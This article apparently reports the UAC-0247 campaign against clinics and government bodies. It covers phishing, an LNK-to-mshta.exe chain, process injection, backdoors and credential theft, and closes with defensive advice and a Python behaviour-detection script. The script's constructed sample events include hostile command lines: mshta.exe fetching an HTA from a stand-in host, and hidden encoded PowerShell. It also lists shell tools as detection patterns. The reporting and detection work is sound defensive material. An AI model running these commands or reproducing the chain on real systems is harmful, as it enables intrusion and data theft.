UAC-0247 Cyber Campaign Targets Healthcare and Government with Advanced Data-Theft Malware
Clinics and public institutions hit by multi-stage malware stealing browser data and WhatsApp information

Targeted Attack on Critical Sectors
UAC-0247 is a threat group targeting government and healthcare organizations; clinics and emergency hospitals are among the primary victims. The activity described here was observed between March and April 2026.
Attackers use trust-based lures to increase success. They disguise emails as humanitarian aid proposals. This approach pushes victims to act quickly.
How the Attack Begins
The attack starts with a phishing email. It contains a link that looks safe. However, the link redirects users to a compromised or fake website.
Some of these are legitimate sites abused through cross-site scripting (XSS) flaws, so the link points at a domain the victim may recognize. Others are AI-generated look-alikes built to pass a quick glance. In both cases the goal is the same: get the victim to trigger a malicious download.
Victims download a Windows Shortcut (LNK) file without realizing the risk.
Multi-Stage Malware Execution
Opening the LNK file invokes "mshta.exe," a signed Windows utility that can run an HTML Application (HTA) fetched from a remote URL. The first real stage is therefore pulled from an attacker-controlled server rather than shipped inside the email.
The HTA displays a decoy form to hold the user's attention while it silently downloads the next-stage payload. That payload is then injected into a trusted process such as "RuntimeBroker.exe."
Running inside a legitimate, signed process lets the malware blend into normal system activity and sidesteps controls that judge a process by its name or signature alone.
Advanced Tools and Payloads
The attackers deploy multiple tools to control infected systems.
RAVENSHELL establishes a reverse connection to the attacker's server and executes operator commands through "cmd.exe."
AGINGFLY acts as the main backdoor. It gives attackers full control over the system. It can log keystrokes, run commands, and download files.
SILENTLOOP maintains persistence, updates its configuration, and retrieves command-and-control server details from Telegram.
Data Theft and Lateral Movement
Once inside, attackers expand their access.
They use tools to extract saved passwords and cookies from Chromium-based browsers. They also target WhatsApp data using forensic extraction tools.
At the same time, they scan the internal network and set up tunnels, which lets them reach and move between other systems while their traffic looks like ordinary connections.
Expanding Attack Surface
In some cases, attackers used messaging platforms like Signal. They distributed malicious ZIP files to deliver payloads.
Evidence suggests possible targeting of defense-related entities. This increases the severity of the campaign.
How to Defend Against UAC-0247
Organizations must take proactive steps to reduce risk.
Restrict execution of LNK, HTA, and script files, for example by pointing the default handler for .hta files at a harmless program such as Notepad, or by blocking "mshta.exe" with application control (AppLocker or WDAC) where it is not needed. Monitor the use of tools like "mshta.exe" and "powershell.exe," in particular "mshta.exe" started with a URL on its command line, and shells or script hosts spawned by "mshta.exe" or by processes such as "RuntimeBroker.exe" that do not normally start them.
Additionally, focus on behavior-based detection: parent-child process relationships and command-line contents reveal this chain even when each individual binary is a legitimate, signed Windows component.
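As an added example (not code from the original report or from any vendor tooling), the following Python script applies the behavior-based checks suggested by the execution-chain and defense sections to a handful of constructed Sysmon-style process-creation events: mshta.exe started with a remote URL, a script interpreter spawned by mshta.exe, RuntimeBroker.exe with a parent other than svchost.exe, and a shell spawned by RuntimeBroker.exe. The events, PIDs, URL, and rule names are all my own assumptions for illustration; the one detail taken from Windows itself is that RuntimeBroker.exe is normally launched by the DcomLaunch svchost.exe.

```python
"""Behaviour-based checks for a LNK -> mshta.exe -> injected-process chain.

Added example: the events below are constructed in the shape of Sysmon
Event ID 1 (process creation) records, not real telemetry from the campaign.
"""
import re
from dataclasses import dataclass

# Script hosts and shells that mshta.exe or RuntimeBroker.exe have no
# legitimate reason to spawn.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full image path, like the Sysmon "Image" field
    cmdline: str  # like the Sysmon "CommandLine" field


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Walk parent links from pid upwards; returns image names, child first."""
    by_pid = {e.pid: e for e in events}
    seen, names = set(), []
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return names


def detect(events):
    """Return (rule, pid) findings, in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else None

        # 1. mshta.exe fetching an HTA from a URL (the LNK stage of the chain).
        if name == "mshta.exe" and REMOTE_RE.search(e.cmdline):
            findings.append(("remote_hta", e.pid))
        # 2. The HTA stage dropping into PowerShell or another script host.
        if pname == "mshta.exe" and name in INTERPRETERS:
            findings.append(("mshta_spawns_interpreter", e.pid))
        # 3. RuntimeBroker.exe is normally started by svchost.exe (DcomLaunch);
        #    any other known parent suggests a spawned-then-injected copy.
        if name == "runtimebroker.exe" and pname is not None and pname != "svchost.exe":
            findings.append(("runtimebroker_odd_parent", e.pid))
        # 4. A shell under RuntimeBroker.exe matches the reverse-shell behaviour
        #    described for RAVENSHELL (commands run through cmd.exe).
        if pname == "runtimebroker.exe" and name in INTERPRETERS:
            findings.append(("shell_from_runtimebroker", e.pid))
    return findings


# Constructed sample (hypothetical host, PIDs and URL): one malicious chain
# plus two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://aid-proposal.example/form.hta"),
    ProcEvent(1200, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc SQBFAFgA"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\RuntimeBroker.exe", "RuntimeBroker.exe"),
    ProcEvent(1400, 1300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    # Benign: RuntimeBroker started by svchost; mshta running a local vendor HTA.
    ProcEvent(2000, 800, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\RuntimeBroker.exe", "RuntimeBroker.exe -Embedding"),
    ProcEvent(2200, 1000, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        chain = " <- ".join(ancestry(SAMPLE_EVENTS, pid))
        print(f"{rule:26s} pid={pid}  chain: {chain}")
```

On the sample the four rules fire once each, on the malicious chain only; the svchost-launched RuntimeBroker.exe and the mshta.exe running a local vendor HTA stay quiet. Each rule keys on a relationship (parent, command line) rather than on the binary itself, which is the point of the defense advice above: every image in the chain is a legitimate Windows file.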
Train employees to question unexpected emails, especially those that create urgency or ask the recipient to download something.
Final Insight
UAC-0247 shows how attackers combine social engineering with advanced malware. They use trusted tools to bypass security controls.
As a result, traditional defenses struggle to detect these attacks. Organizations must adapt quickly and strengthen their security posture.